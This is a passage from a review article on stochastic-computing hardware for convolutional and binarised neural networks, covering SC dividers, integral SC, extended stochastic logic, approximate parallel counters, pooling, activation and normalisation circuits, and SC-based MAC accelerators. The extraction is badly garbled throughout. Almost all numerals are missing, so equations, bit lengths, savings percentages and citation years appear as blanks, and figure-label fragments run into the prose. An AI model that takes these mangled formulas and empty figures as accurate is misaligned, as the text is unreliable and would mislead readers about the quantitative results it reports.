x’ x  x x  x’ x’ y= y= a b figure sc with advance arithmetic operations. (a) stochastic squaring with d flip-flop. (b) k-state fsm for stanh function which will be widely utilised in sc cnn. full-size doi: . /peerjcs. /fig- exists in the stochastic domain. an improvement in fsm design can also emulate linear and exponential functions (najafi et al., ). the real challenge in sc (also the missing part of sc) is the stochastic divider design. stochastic division traditionally used fsm with extra sng components for gradient descent approach as shown in figs. a and b, but the gradient descent convergence time incurred inaccuracy on the output. newer sc divider from chen & hayes ( ) exploited the stochastic correlation properties to perform stochastic division without using expensive sng as shown in figs. c and d. this event is possible because if stochastic stream p(x) and p(y) are perfectly correlated, and p(x)<p(y), then by probability math: p(x = ,y = )=p(x = ). ( ) given that conditional probability p(x = |y = ) (probability of x = given that y = ) can also be expressed as: p(x = |y = )= p(x = ,y = ) p(y = ) = p(x) p(y) , ( ) the desired divider function on the sc domain is derived as a result. hence, the stochastic division can be performed if both stochastic streams are perfectly correlated by evaluating the conditional probability of x and y. in the case of p(x)>p(y), the output will be clipped to a value of . chu ( ) improved the circuit by using jk flip-flop, but only for unipolar sc division. the overall structure of sc is thus explained. other than the benefit of power efficiency, sc is also inherently error resilient where accidental bit flips will not affect the overall operation of the stochastic circuits; otherwise, it could be catastrophic in deterministic computing. secondly, sc is inherently progressive precision whereby the output value converges from the most significant figures. for instance, if the output is . , then ‘ . ...’ will show first in the stochastic compute cycles instead of ‘... ’ in the conventional binary. this characteristic is useful in specific applications, such as weather forecasting, where only the most significant figure matters in decision making. thus, performing edt in sc without waiting for complete computation is possible. with that said, its simplicity lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sng sng sngout down up counter x x px px binary  gradient  descent px /x sng sng sngout down up counterx x px px binary  gradient  descent px /x q q set clr d clk px px px ‐zpx z u lfsr x comparator u lfsr x comparator lfsr x x s s d c enb multiplexer q q set clr d px px px /x clk u lfsr x comparator u lfsr x comparator lfsr x x s s d c enb multiplexer q q set clr d px px |px /x | clk s s d c enb multiplexer . . (px +px ) sign(x ) sign(x ) px /x a b c d figure sc divider circuits. (a) former gradient descent unipolar divider. (b) former sc bipolar di- vider. (c) newer sc unipolar divider by exploiting correlation. (d) newer sc bipolar divider by adding sign information. full-size doi: . /peerjcs. /fig- did come at a cost. increasing math precision in sc also requires long bit lengths, thus increasing computing time latency by n folds. for instance, doubling numerical precision from to bits requires increasing bit length from = bits to = bits, or times exponential increase in computing latency. sc becomes unfavourable to modern computation needs due to the ever-increasing efficiency in binary computing. nevertheless, certain niche applications can still benefit from sc topology, such as a low-density parity-check decoder in a noisy data-transmission environment; very robust image processing tasks, such as gamma correction and sobel edge detection (joe & kim, ); and the recent interest in cnn algorithm. cnn with the advancement of computing technology, many applications are getting highly reliant on probabilistic computation. deep neural network (dnn) is a widely accepted class of machine learning algorithms to process complex information, such as images and videos. the nature of dnn consists of layers of addition and multiplication of numerical weights that end up computing the overall dimensionless probability values of an output class, which in turn allows the computer to decide based on the output value. many dnn algorithm variations exist, each for a particular purpose, such as cnn for image processing and long short-term memory for neural-linguistic processing. cnn, for example, can reduce multidimensional images into simple classes; thus, cnn is very popular in image classification and object recognition. the most distinctive component that discriminates cnn from other dnn algorithms is its convolution layer. cnn can reduce large matrices into a single value representation, as shown in fig. a, which explains its superior capability of dimensional reduction in image lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. x l‐ w l‐ x l neuron model f(∑wixi + b) w x f(x) class  x x x x x x x x x x x x x   convolution x   subsampling x   convolution x   subsampling fully  connected a b c flatten figure cnn’s convolution and activation. (a) matrix convolution. (b) neural network model after the convolution. (c) architecture of classical lenet- cnn. full-size doi: . /peerjcs. /fig- processing. the convolution process can be generalised as: ylj = f ( xlj ) = f ( n∑ i= ( xl− i ×w l− ij ) +blj ) , ( ) where xlj is the convolved feature of the next layer, x l− i is the feature from the previous layer, wl− ij is the kernel weight matrix, and b l j is bias. ‘l’ is the layer number, ‘i’ denotes scan window number, ‘n’ is the total number of scan window, and ‘j’ is the depth of next feature map. after the convolution, the activation function f ( xlj ) exists, which can be a linear or non-linear function. rectified linear unit (relu) and tanh are just the names of a few popular activation functions. the final product ylj will be aggregated, and the process repeats, depending on the structure of the cnn model. the convolution and activation layers are fundamental in cnn, albeit other optional layers exist, such as normalisation layer (to reduce output variance) (ioffe & szegedy, ), pooling layer (to save memory), and dropout layer (to prevent overfitting) (hinton et al., lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ). at the end of convolution, the convolved pixel matrix will be flattened into a single list of data. then, those data will be fed to a highly traditional biological neuron-inspired model, so-called fully connected neuron or dense layer, as shown in fig. b. moreover, multiplication and addition repeat until the model converges to the size of the desired class output. a simple lenet- model (liew et al., ) as depicted in fig. c shows the end-to-end structure of a typical cnn, from the input image to output class. its cascaded arithmetic operation is where the cnn algorithm execution stressed the modern processor. it either spends too much processor time to serialise the process, or taking many hardware resources for parallelisation. the convolution arithmetic does multiplication and addition exhaustively. if the matrices of scanning windows are large or the network is deep/wide, then the computational demands required are high. as the multiplication and accumulation operations increase, memory access bottlenecking becomes the major limitation for dnns (capra et al., ). traditional computing also uses floating-point units (fpu) which takes a wide area with high power consumption due to the colossal amount of logic gates involved. as the edge computing gains interest as the future trends of computation, energy efficiency has become a major concern for the cnn development and urged the researchers to rethink another way to process the information efficiently. most of the modern fpu is of -bit floating-point (full precision). thus, reducing the precision to bits (half precision) or lower is one of the ways to improve cnn computation efficiency without much accuracy degradation. bnn in an extreme case, the parameters are reduced to only a single bit representation. this radical simplification of cnn is called bnn and gained attention among researchers in the industry due to its compactness in memory usage and practicality (simons & lee, ). in bnn, the parameters can only have two possible values, that is, − or . despite some considerable degree of accuracy degradation, bnn does have several unique advantages. first is its model size; for instance, mb of parameter data can be reduced to mb, thus allowing the deployment of small embedded systems. its little memory usage also allows memory-centric computing where the parameters can be stored directly beside the processing elements, thereby speeding up the computation by eliminating data communication cost (angizi & fan, ). second is its hardware implementation capability. bnn requires some amount of arithmetic logic unit (alu) to process fixed-point image data at the frontend (still cost less than fpu). however, the multiplication of the hidden layer can be simply an array of xnor gates because the multiplication of − and is of bipolar math. the high hardware utilisation of bnn in fpga results in high throughput, whereas being an order of magnitude if not more energy-efficient than cpu and gpu despite lower clock speed (nurvitadhi et al., ). another unique advantage is that bnn is less susceptible to adversarial attack with stochastic weight quantisation in the hidden layer (galloway, taylor & moussa, ). the adversarial attack is where data, for example, an image, are injected with noise and adversely affect the output class decision of a fine-tuned cnn model, albeit the doctored image has no perceptual difference to human eyes. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. however, non-linear functions become useless due to the extreme information loss by the parameter quantisation. instead, a threshold function can simply replace the normalisation and activation functions (simons & lee, ). the bnn also suffer accuracy degradation from highly challenging datasets, such as imagenet classification, due to extreme information loss. as many studies explore for better bnn optimiser algorithms, zhu, dong & su ( ) found that training optimisers might not help much due to bnn insensitivity to small changes in value. instead, bnns in parallel with ensemble technique (multiple trained bnns in parallel and final decision with a majority vote) is a perfect fit, improving the overall bnn accuracy on large image classification datasets. sc cnn vs bnn the evolution of cnn to bnn challenged the idea of sc due to the competitiveness in hardware implementation capability. sc implementation is technically more challenging than bnn due to various custom logics and substantial uncertainty in future community support. after all, sc is still at its infancy in the cnn domain. regardless of the different intentions and directions of development of sc and bnn, both studies try to explore alternatives for a highly efficient computing paradigm in the future of the iot edge computing. with the massive exploitation and integration of dnn algorithms into small or remote devices, such as a smartwatch or surveillance camera, both fields of studies will contribute to the development of a highly realistic edge computing ecosystem. sc implementation in cnns sc is considered the next frontier in energy-efficient edge computing (jayakumar et al., ) due to its energy-efficient operation and ability to tolerate errors in domains of recognition, vision, data mining and so on. meanwhile, many applications attempt to offload challenging workloads from cloud computing to edge devices. thus, sc had become the hotspot of research interest. integral sc: a radical change in sc methodology for the sake of cnn cnn is very popular in vision application due to its simplicity and accuracy. however, sc does not provide out-of-box experience as sc is not yet customised and explicitly optimised for the cnn algorithm. hence, ardakani et al. ( ) proposed a radical idea to use an integer stream instead of the traditional bitstream. the stochastic byte is∈ [ , , ...] so that to repurpose simple binary multiplier and bitwise and as shown in figs. b and c to process integer number in the stochastic domain, or integral sc. the idea is to preserve information across different precisions within a limited stochastic length. the effect of information loss becomes apparent when many mux half-adding many stochastic streams exist together. the resultant precision requirements will only increase and require long overall bitstreams to preserve the precision of the half-added stochastic number. for example, a value of . ( / ) requires a -bit length stochastic stream, whereas . ( / ) only requires -bit length. although . can be expressed in -bit length, half-adding both numbers result in . ( / ), or at least -bit length to preserve the output precision in the stochastic domain. if so, the overall stochastic bit length will need to be extended to -bit length. cascading mux adders in the cnn convolution lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u x x integral sc  elements .  =  .  =    binary multiplier /  =  /  =  /  =  s s d c enb multiplexer /  =  /  =  /  =  s x s x s x integral sc  and s x integral sc  and s x integral sc  and s x integral sc  and s x integral sc  and s x tree adder nstanh stochastic  bitstream binary binary a b c d integral sc  neuron figure integral sc methodology. (a) high precision stochastic number can be represented with shorter stream length with integer value. (b) binary radix multiplier as integral sc scaled adder. (c) modified mux as integral sc multiplier. (d) integer sc neuron block. full-size doi: . /peerjcs. /fig- stage will drive up the bit length requirements drastically, thus incurring considerable computational latency. the same problem also applies to the multiplier. then, the integral sc comes into play. take fig. a as an example. a value of . can be effectively represented in the same length as the -bit length value of . . given that integral sc can preserve the stochastic information in an integer value, the final batch adding operation in cnn can be processed with tree adder as shown in fig. d, eliminating parallel counter. integer stream also allows short stochastic stream length, thus speeding up the sc time. they also proposed integer version of tanh k-state fsm because the traditional stochastic tanh (stanh) function on fsm only accepts stochastic bits, thereby leading to the modern tanh fsm design. however, integral sc only solved the precision degradation issue, and many other cnn functions are yet to translate to sc domain. moreover, the usage of binary adder and multiplier may not scale well in the case of deploying large cnn models. they claimed energy saving of % compared with the full binary radix computing but is still far from the expected power reduction in the sc transition. extended stochastic logic (esl): another radical approach esl made an extreme modification to the sc methodology if integral sc is not radical enough. instead of using a single stochastic bitstream for a value, esl used two stochastic streams such that their ratio of division represents the actual value (canals et al., ). esl intends to compute the entire range of real numbers in the stochastic domain. for example, if x* is a whole number, then x* = p*/q*, where p* and q* are the esl stochastic pair for x*. p* and q* remain in real number∈ [− , ] in the bipolar format, but obtaining its ratio x* can translate to the entire range of real numbers ∈ [−∝,∝]. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s s d c enb multiplexer . p* s* q* r* q* s* t* u* p* r* q* s* t* u* esl multiplier p* s* q* r* t* u* esl divider esl adder/subtractor a b c figure esl arithmetic unit. (a) esl multiplier. (b) esl divider by crossing multiplication. (b) esl adder and subtractor circuit. full-size doi: . /peerjcs. /fig- esl requires dedicated logic gate for p* and q* stochastic streams. taking figs. a and b as an example, if x* = p*/q* and y* = r*/s*, then by probability math, multiplication between two separable stochastic streams will be: x∗×y∗= p∗×r∗ q∗×s∗ = t∗ u∗ , ( ) where t* and u* are the output pair of stochastic streams. division can be done simply by flipping the nominator and denominator of the second stochastic pair. in the case of stochastic addition, the stochastic pair can be processed such that: x∗+y∗= p∗ q∗ + r∗ s∗ = p∗×s∗+q∗×r∗ q∗×s∗ = t∗ u∗ , ( ) whereas subtraction can be done by not gate inversion as shown in fig. c. value splitting is feasible in the stochastic domain due to the nature of probabilistic computing. however, splitting into double stochastic streams complicated everything, including a compulsory custom bipolar divider (convert t* and u* back to real number representation) before bipolar tanh function blocks. the custom block extensively used comparator and rng, which add a red flag for efficient computing. the neural network may compute in the real number ∈ [−∝,∝] on the early day, but the cnn nowadays lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. commonly compute in bipolar math. after all, the final output class of cnn only need to tell the computer whether the probability ∈ [ , ]. esl did provide an insight into how sc can perform normal arithmetic full-range computation. however, verifying whether esl is better than other sc methods for cnn use case despite the attractive circuit simplicity in primary arithmetic operations is hard due to the non-linear activation function complexity in esl implementation. approximate parallel counter (apc) and btanh: a simple and energy-efficient approach implementing radical changes in every sc component might not be easy. thus, another highly effective approach with traditional stochastic bitstream is apc. other than the frontend binary to stochastic conversion stage of sngs, the final stochastic to binary conversion stage is also equally important (kim, lee & choi, a; kim, lee & choi, b). in the case of accumulating multiple bitstreams, mux adder could become inaccurate due to loss of n− bits input information (li et al., c). in this case, a parallel counter as the one in fig. b is preferred consisting of an array of full adders (fa), but fa is relatively expensive as it uses binary adder logic circuits. the accurate parallel counter should no longer be used as sc is already based on approximate computation. thus, an apc has been proposed to reduce the fa components with a slight trade-off on accuracy whilst achieving the same counting function at lower area and power consumption as shown in fig. a. the proposed apc could save area and power by . % and . %, respectively. the caveat is that the output from apc is in the binary domain; thus, directly removing any stochastic stream from the stochastic domain computation. although the traditional stanh uses single input k-state fsm, with the inspiration from integral sc research, the binary output from apc is cleverly reused as an input for another modified binary input fsm called btanh. tanh activation function is essential in cnn. for example, if the binary output value is , then the fsm will directly jump four states instead of step-wise jumps in stanh. more granular tanh step-function could also be achieved, which is not possible with stanh fsm. in the end, the binary output values from apc will be indirectly converted back to stochastic stream with tanh non-linear function applied, completing the stochastic convolution computation as depicted in fig. c. moreover, energy usage can be further reduced by % by sacrificing . % of accuracy with edt, that is, terminating computation at % of the computing time. then, their apc and btanh components had become the foundation for other sc cnn approaches in the next coming years. near-perfect sc implementation in cnn algorithm ren et al. ( ), li et al. ( c); li et al. ( b), ren et al. ( ) and li et al. ( a) proposed a complete overview of a near-perfect cnn analogy in the sc domain, including the following: the missing pooling layer, relu and sigmoid activation layer, and normalisation layer which will be discussed separately in the sub-sections below. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder approximation unit sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder s s s s parallel counter btanh activation s s sn‐ sn n stochastic  streams binary of log n bit stochastic  streams a b c figure sc bitstream accumulation. (a) apc. (b) accurate parallel counter. (c) accumulation and btanh activation workflow. full-size doi: . /peerjcs. /fig- sc average pooling and max-pooling layers the purpose of cnn pooling layer is to reduce memory usage and reduce model size. ren et al. ( ) first used cascaded mux as the average pooling function in cnn as shown in fig. a. this solution is simple but may face the precision loss issue as described in the integral sc research. average pooling may not help in cnn training convergence either. ren et al. ( ) proposed max-pooling hardware equivalent to the widely adopted cnn max-pooling layer. the stochastic stream with a maximum value at any given time in the stochastic domain could not be verified. hence, a dedicated counter for each stochastic stream is required to sample and evaluate which stream is of maximum value. by referring to fig. b, the counter samples the first few bits and compare the magnitude at the end of bitstream sampling to make an early decision on which stochastic stream should be chosen to continue the path. the first few bit information could be inaccurate and thus is an approximate max pooling. nevertheless, the decision will eventually converge to the bitstream of maximum value if the sampling continues due to the properties of sc progressive precision. moreover, if the bitstream is long, then less information will be lost, thereby achieving negligible accuracy loss. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s s d c enb multiplexer s s d c enb multiplexer s s d c enb multiplexer . . . average  pooling s s d c c enb multiplexer c o u n te r c o u n te r c o u n te r c o u n te r comparator max  pooling u x en tanh s s d c enb multiplexer max(x,y) x y u x x tanh max u x x tanh max u x x tanh max max  pooling s s s s s s s s s s s s tanh max a c b figure sc pooling function. (a) × average pooling with cascaded mux adder. (b) hardware- oriented approximate max pooling circuit. (c) stochastic max function, cascading them will create pure sc max pool block. full-size doi: . /peerjcs. /fig- however, a more straightforward stochastic max-pooling block was proposed by yu et al. ( ). with only an xor gate, fsm and mux, a novel stochastic max block could select whichever stream of higher value. with xor gate controlling the fsm state jumping, the probability of the opposite stream could be inferred from another bitstream by generating the condition of bit entanglement. as such, whenever the fsm sampled a ’s bit from the current bitstream, it implies a ’s bit on the opposite bitstream. thus, whenever inequality between two bitstreams exists, the fsm state will be biased to the one with higher magnitude, completing the max function with the mux. cascading the max function block could realise the max-pooling function block as shown in fig. c. sc relu and sigmoid activation layer the cnn activation layer is similar to the usual neuron activation function. relu function, as the name suggests, performs rectification and cutting off any negative value such that: f (x)=max( ,x). ( ) relu function is trendy due to its fast computation and solves diminishing return in backward propagation learning during the cnn training stage. however, no sc equivalent circuit existed for that particular function; thus, li et al. ( a) proposed a novel sc-based relu function block as depicted in fig. a. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xn u x x stochastic  stream  pooling s s d c enb multiplexer u x x linear fsm x >x x x comparator accumulator half‐clock up  counter state number relu(x) + parallel counter ‐ parallel counter x‐ ‐ u x+ + adder q q set clr d > s s sn bias + / s s sn bias ‐ / sigmoid(x) a b comparator figure other sc activation functions. (a) relu activation function. (b) sc sigmoid activation func- tion with bias input. full-size doi: . /peerjcs. /fig- firstly, the relu amplitude will be naturally maxed out at value = in the stochastic domain, but this is not a concern as clipped relu has no significant accuracy degradation (fei-fei, deng & li, ). secondly, a negative value must be clipped to zero. notably, the number of ’s bit in the bipolar stochastic stream determines the magnitude of negativity. thus, when the accumulated value is less than the reference half value (the ’s bit is more than ’s bit) in a given sample time, the output will be forced to be ’s bit. otherwise, the output will follow the pattern of emulated linear function from the fsm. although real number convergence in the accumulator takes time, the real value information is equally distributed in the stochastic bitstream. hence, obtaining an accurate comparison is possible by observing the first few bits of information; thus, inaccuracy is negligible. moreover, the comparison is synchronous to the input; therefore, no latency will be incurred. in the case of larger and deeper cnn models such as vggnet and googlenet, the sigmoid function becomes more favourable as non-linear function. as such, li et al. ( a) proposed a hardware-oriented sc sigmoid approximation function as shown in fig. b. since the output of the stochastic stream is maxed at , the taylor series expanded lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sigmoid function could be approximated as: +exp(−x) ≈   ,x > + x,− ≤x ≤ ,x <− . ( ) by strategically partitioning the positive summation and negative summation in such a way that: a= ∗ ∑ pos p ·q+ + bias+ ,b= ∗ ∑ neg p ·q+ bias− , ( ) the approximate stochastic sigmoid activation function could then be realised by subtracting both parts such that: a−b= + (∑ p ·q+bias ) , ( ) where ‘p’ and ‘q’ are the weight and pixel value respectively. therefore, by pre-scaling the weights and bias to quarter times, the stochastic sigmoid function could be devised as a result, with the added benefit of including bias information which is missing in the previous sc cnn implementation. the binary adder now is the sigmoid activation function itself, eliminating the need for extra hardware cost such as fsm. however, unlike the apc + btanh function block, the accurate parallel counter is needed. the sigmoid function is not limited to cnn algorithm, or rather, is a universal activation function in other dnn classifier algorithms such as multilayer perceptron and restricted boltzmann machine. with -bit length stochastic stream, the proposed sc sigmoid activated convolution neuron block could perform as accurate as binary computing cnn while consuming . % and . % less area and power respectively, hugely improving the capability of sc in the dnn algorithm computation in general. sc normalisation layer the purpose of the normalisation layer is to reduce internal covariance, thereby improving the overall cnn output accuracy. if the relu activation is applied to the previous layer, only a simple local response normalisation function is required, which can be summarised as: bix,y = aix,y( k+α ∑min(n− ,i+n/ ) j=max( ,i−n/ ) ( ajx,y ) )β , ( ) where the summation part accumulates all n numbers of adjacent neuron output of aix,y. ‘k’, ‘n’, ‘ α’, and ‘β’ are hyperparameters which can be determined by cnn backpropagation training. the complexity of the mathematical relationship can be decoupled into three compute components, square and sum (calculate the denominator components), exponential function with ‘‘β’’ and finally division. li et al. ( c) used stochastic square, fsm activation block and traditional gradient descent sc divider to construct sc normalisation circuit as shown in fig. to perform sc normalisation. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u u u u x x x u x x sc square  array x x x u x x apc adder fsm based  normalisation  block  function, k, α, β  u x x sc division neuron out  neuron out  neuron out  divident normalised  neuron out  stochastic  domain binary  domain divisor stochastic  domain figure normalisation unit in sc cnn. full-size doi: . /peerjcs. /fig- the accuracy had improved with sc normalisation function and only dropped by . % compared with the original binary alexnet cnn model, achieving six times in the area and five times in power savings compared with binary equivalent normalisation. however, they could have utilised newer sc divider as discussed in the basic concept section. other optimisations the dropout layer is one of the regularisers in cnn to prevent overfitting. however, dropout layer functions only at the cnn training phase, and no custom hardware adaptation is needed at the inference stage, hence no extra hardware overhead. li et al. ( a) optimised the apc function block by utilising inverse mirror fa to reduce the number of transistors required for single fa from to transistors. they also proposed the apc design which input is not a power of two by incorporating inverse half adder. apc optimisation further reduced the area required by at least % and an average of % improvement in energy efficiency. in terms of sc accuracy, the bipolar format remains the major limitation as bipolar is generally worse than the unipolar in terms of sc accuracy (ren et al., ). to overcome the signed value accuracy limitation, zhakatayev et al. ( ) decoupled the sign information from the stochastic stream and added one stochastic bit pair specifically to store the sign value. unlike stochastic probability value, the sign value of a stochastic stream is deterministic, thus, can be processed separately from the stochastic magnitude. although small hardware overhead is needed to process the sign function, such as an extra xor gate to multiply signed value, the accuracy gain is significant, ∼ . times better compared to the bipolar format. with that advantage in mind, the little extra hardware cost for sign processing is trivial. binary interlaced sc, two is better than one full-fledged sc cnn might not be feasible to fit a wide variety of modern complex cnn models. however, the massive multiplication parallelism of sc is still very favourable. thus sc-based multiply-accumulate (mac) unit was proposed by sim & lee ( ) as shown in fig. a to act as multiplier accelerator for binary computing. the mac leverages the parallelism of sc multiplier, then accumulate value with accurate parallel counter, lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. u u u u un x x x xn u x x xnor gate  array x x x xn u x x parallel  counter u u u u un u x accumulator +log n b in a ry s to ch a st ic   st re a m s sng sng sng sng sng normal sc weight push ahead down  counter counter counter counter / / / / / stop counting stop  signal / / / s s d c c enb multiplexer clk x x custom fsm time x x x x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x a b c b in a ry  i n p u t figure binary interlaced sc, where sc is used as mac accelerator. (a) sc mac unit block. (b) sc mac optimisation by cutting off sc early with advancing weight bits. (c) novel sng with mux and fsm. full-size doi: . /peerjcs. /fig- returning pure binary value to other binary computing circuits at the end of sc cycle. this approach, while not the most energy-efficient one, achieved two times the area efficiency and at very high throughput compared to binary computing. with only a single layer sc in mind, sim et al. ( ) further leveraged the sc mac to perform unipolar sc multiplication. all the stochastic ’s bit of the neuron weight value was pushed ahead of time by down counting the weight value so that the sc cycle could terminate when the stream tail of the weight ended with ’s bit as depicted in fig. b. this event is possible because any section of the stream could represent the true value of the stream due to the probabilistic nature. it is technically feasible as long as single layer sc is concerned. they lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. also proposed a novel mux fsm based sng. by predefining the mux selection sequence in such a way that the output is the sum of binary weight, the binary input could be directly converted into a stochastic stream as depicted in fig. c, eliminating the need of wbgs which could be expensive in fpga implementation. with the strategic down-counting timing, an area-delay product reduction of %∼ % is achieved while being %∼ % more energy efficient compare to binary computing. in any case, they ignored the sngs hardware overhead in performance comparison. considering that only a single sc layer is required, hojabr et al. ( ) radically redesigned the mac unit by exploiting computing pattern in modern cnn design and proposed differential mac (or dmac). firstly, because cnn relu function always returns positive value, in addition to the binary pixel of positive value, thus, up/down counter could be used as relu function. secondly, considering that a pixel value will eventually pass through all the weight multiplication matrix of cnn scanning window in the convolution process, the neuron weights could be sorted offline ahead of time. in this way, the weight differential from the next sorted weight of higher value is guaranteed to be positive, thus, can be fed to a down counter similar to sc mac to pipeline the stochastic multiplication. since the first weight is of minimum value which could be negative, a d flip-flop is used to hold the sign information just for the first bipolar multiplication. thus, multiplying in sc is as simple as counting the number of bits from the mux and-ing with counter ‘enable’ control from the weights as depicted in fig. . the fsm could be shared among all mux, ignoring the stochastic correlation issue because the multiplication is mutually independent (yang et al., ). the buffered accumulated value will then continue the summation operation as the dmac final stage. this major circuit overhauling could deliver . times and . times gains in speed and energy efficiency respectively relative to the former mac with the benchmarking on more modern cnn models. stochastic quantisation, sc is going asynchronous in the face of quantised binary cnn whereby the arithmetic is lower than -bit precision, no optimisation had been done on the sc cnn counterpart. sc could consume a lot of logic gates as well, especially in cnn use case. thus, li et al. ( b) proposed a novel multiplier with shifted unary code (suc) adder. from the binary interlaced sc research, the weights do not have to follow probability distribution as the pixel value does, as long as the next sc component is not computing in the stochastic domain. by strategically using the weight information as a timing control for sc multiplication, meaningful bits from each stream could be quantised and unified into a single multiply-sum-averaged stochastic stream by or-ing the parallel bitstreams asynchronously as depicted in fig. . the suc adder significantly reduced the requirement of parallel counter whereby its internal fa is expensive in the perspective of sc. the area and power savings are significant as a result, as much as . % and . % respectively relative to usual unipolar sc with less than % accuracy loss compared to quantised binary cnn, paving the way for more efficient parallel counting accumulation mechanism in sc cnn. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u/d reset b b carry out enb counter u/d reset b b carry out enb counter u/d reset b b carry out enb counter s s d c c enb multiplexer s s d c c enb multiplexer s s d c c enb multiplexer reset x x custom fsm u/d reset b b carry out enb down counter q q set clr d b in a ry   b in a ry   b in a ry  n w w scheduler o u tp u t  b u ff e r w =w ‐w weight indexer binary domain stochastic domain binary domain sign index p(x ) p(x ) p(xn) i weights figure differential mac. major overhauling to the sn mac with counter and differential weight control indexing to pipeline the sc mac computation. full-size doi: . /peerjcs. /fig- lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sng sng sng sng a b c d / / / / a/ +b/ +c/ +d/ suc adder sng sng parallel counter sng sng sng sng u x x suc adder u x x suc adder u x x suc adder bias+ x‐ ‐ u x+ + adder q q set clr d > sigmoid(x) sng sng parallel counter sng sng sng sng u x x suc adder u x x suc adder u x x suc adder bias‐ a b figure stochastic quantisation accumulation with suc adder. (a) the different information por- tion of the stochastic stream could be encoded into a single stream by or-ing the required bitstream asyn- chronously. (b) suc paired with sc sigmoid activation function. full-size doi: . /peerjcs. /fig- lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s s d c enb multiplexer s s d c enb multiplexer vin v/ v/ v/ v v v y y y vin y y y <v/ <v/ < v/ > v/ x x x y binary thermometer code y y y y y y y y y y y y y x x x a b figure asc with thermometer coding. (a) implementation of asc on thermometer-encoded sc cir- cuit, eliminating the need for adc and memory components. (b) thermometer coding could be utilised for sngs. full-size doi: . /peerjcs. /fig- analog-to-stochastic converter, sc cnn is ready to be embedded in the case of direct interfacing with analogue input, such as analogue camera sensor, analog-to-digital converter (adc) is usually being deployed, but at the cost of requiring memory storage. zhang et al. ( ) proposed a novel converter, namely, analog-to- stochastic converter (asc) as shown in fig. a where the analogue voltage differential could be directly decoded into stochastic streams with thermometer encoding scheme. the stochastic stream could either be encoded via lfsr, counter, or newly proposed thermometer coding as depicted in fig. b. the thermometer coding is capable of generating parallel bit streams at once but has higher error compared to the others. nevertheless, with long enough bitstream length, those error is negligible. the thermometer encoding enabled the design of novel asc which allows sc cnn to be directly interfaced with analogue voltage input, eliminating adc and memory storage. sc cnn is meant for memory-centric computing notably, sc cnn does require a tremendous amount of weight data similar to fixed point binary cnn. despite many sc cnn architecture innovations, however, without efficient weight storage near to sc elements, sc cnn will suffer memory bandwidth bottlenecking similar to the binary computing. since the weight information is fixed from the training process, those data can be stored in a more area and power-efficient non-volatile domain-wall memory (dwm) (ma et al., ) built beside the sc elements. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xnor gate (‐ ) (‐ ) (+ ) (‐ ) (+ ) (+ ) (+ ) (‐ ) (‐ ) (‐ ) (+ ) (+ ) encoding (value) xnor multiply sc bipolar  multiply bnn vector  multiply . . ... ... ... ... a b c figure sc bnn methodology. (a) the similarity of sc and bnn in terms of logic gate utilisation. (b) usual configuration in binary bnn. (c) sc bnn first layer binary image conversion in sc bnn. full-size doi: . /peerjcs. /fig- this strategy could eliminate memory bandwidth bottlenecking by bringing memory closer to the computing element, namely, memory-centric computing or in-memory computing. sc cnn can greatly benefit from memory-centric architecture due to the nature of massive parallelism. memoisation approach could also be executed in memory-centric design by storing the weight data directly in a predefined stochastic bitstream representation instead of original binary values. as such, sequential read of stochastic bit from dwm could use less energy while reducing the sngs usage. further area reduction could be achieved by sharing apc and weights. thus, an area and power reduction of . % and . times were reported respectively relative to standard sc cnn as a result of resource sharing and more efficient memory-centric architecture in the sc cnn circuit. sc implementation in bnn: the best of both worlds as mentioned earlier in the basic concept section, bnn challenged the existence of sc circuits in cnn computing. as the saying goes, the enemy of an enemy is a friend, and considering that sc and bnn target efficient cnn computation, why not combine both to maximise the benefits from both aspects, which is what (hirtzlin et al., ) precisely targeted for. the inspiration for this particular approach is that 